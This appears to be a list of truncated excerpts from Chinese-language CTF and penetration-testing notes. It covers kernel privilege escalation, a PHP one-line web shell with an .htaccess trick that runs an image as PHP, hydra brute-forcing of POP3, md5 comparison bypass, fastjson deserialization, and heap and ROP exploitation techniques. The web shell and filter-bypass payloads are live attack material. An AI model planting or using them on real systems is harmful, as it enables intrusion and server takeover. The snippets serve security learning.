1.系统内核漏洞提权uname -a #查看系统内核和版本信息 然后searchexploit查找漏洞的exp searchexploit 39166 # ubantu 14.04 的提权脚本 或者http://www.exploit

1.php一句话木马<?php @eval($_POST['cmd']); ?> .htaccess配置文件 <FilesMatch "1.jpg"> sethandler application/x-httpd-

hydra暴力破解pop3用户名密码后，使用nc 登录进去 nc 192.168.18.20 <port> user <username> pass <password> list # 返回每个邮件的大

# md5强比较时可用 如 if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {

一、反射式编程指计算机程序在运行时可以访问、检测和修改它本身状态或行为的一种能力。 java.lang.Class //获取类对象 Class.forName(className) //获取类对象 newInstance

1.fastjson介绍fastjson是java中处理序列化与反序列化的一个库，fastjson.Json将java类序列化json格式的字符串，fastjson.parse和fastjson.Objectparse将json格式的字符串

1.malloc2.free3.calloc分配所需的内存空间，并返回一个（一组）指向它（它们）的指针。 malloc和calloc之间的不同点是，malloc不会设置内存为0，而calloc会设置分配的内存为0 4.realloc更改已经

概念1.简介俗称脱链，就是将链表头处的free堆块从unsorted bin中脱离出来，然后和物理地址相邻的新free的堆块合并成大堆块（向前合并或者向后合并），再放入到unsorted bin中。 把两个free掉的物理相邻的两个堆块合并

1.S(Signal)ROP漏洞原理在进行系统调用时，内核会保存断点信息，主要是将所有寄存器压入栈中，以及压入signal信息，以及指向sigreturn的系统调用地址。我们称ucontext和siginfo这一段为signal frame

1.定义原理：栈迁移实际上是解决当原始栈可读入字符串长度不够的情况下rop链往哪儿写的问题，因为rop链必须借助栈溢出来达到攻击手段，所以rop链必须写在栈上，所以我们需要改变rsp的值来改变栈帧为能容纳rop链的那块区域。 2.利用方式

1.定义ret2csu就是指利用glibc编译出的程序中普遍存在的一个函数__libc_csu_init，来当作万能的gadget控制函数的参数的。 在想要构造rop链但没有pop rdi|rsi|rdx;ret时可以考虑通过ret2csu

绕过 preg_match正则匹配可用\绕过，如cat—>c\at